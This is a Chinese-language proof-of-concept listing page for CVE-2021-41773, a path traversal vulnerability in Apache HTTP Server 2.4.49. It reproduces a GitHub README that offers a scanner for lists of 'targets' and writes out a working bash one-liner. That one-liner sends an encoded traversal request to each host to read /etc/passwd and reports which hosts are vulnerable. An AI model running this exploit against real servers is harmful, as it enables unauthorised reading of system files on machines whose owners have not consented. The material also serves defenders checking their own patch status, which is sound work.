POC详情: 38b4e313b263c8b3a82d7092cf6d2ac82b710d81

来源
https://github.com/ZephrFish/CVE-2021-41773-PoC
关联漏洞
标题: Apache HTTP Server 路径遍历漏洞 (CVE-2021-41773)
描述:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 2.4.49版本存在路径遍历漏洞,攻击者可利用该漏洞使用路径遍历攻击将URL映射到预期文档根以外的文件。
介绍
# CVE-2021-41773 Proof of Concept
Quick and dirty proof of concept for checking if hosts vulnerable to CVE-2021-41773

```
python3 full.py hosts.txt
```

Where hosts.txt contains your targets:
```
domain.com
blah.com
192.168.1.1
```

It'll print out if the host is vulnerable or not vulnerable. 

Python version of bash:
```
cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
```



Enjoy!
文件快照

 [4.0K]  /data/pocs/38b4e313b263c8b3a82d7092cf6d2ac82b710d81
├── [2.7K]  full.py
├── [2.2K]  poc.py
└── [ 576]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。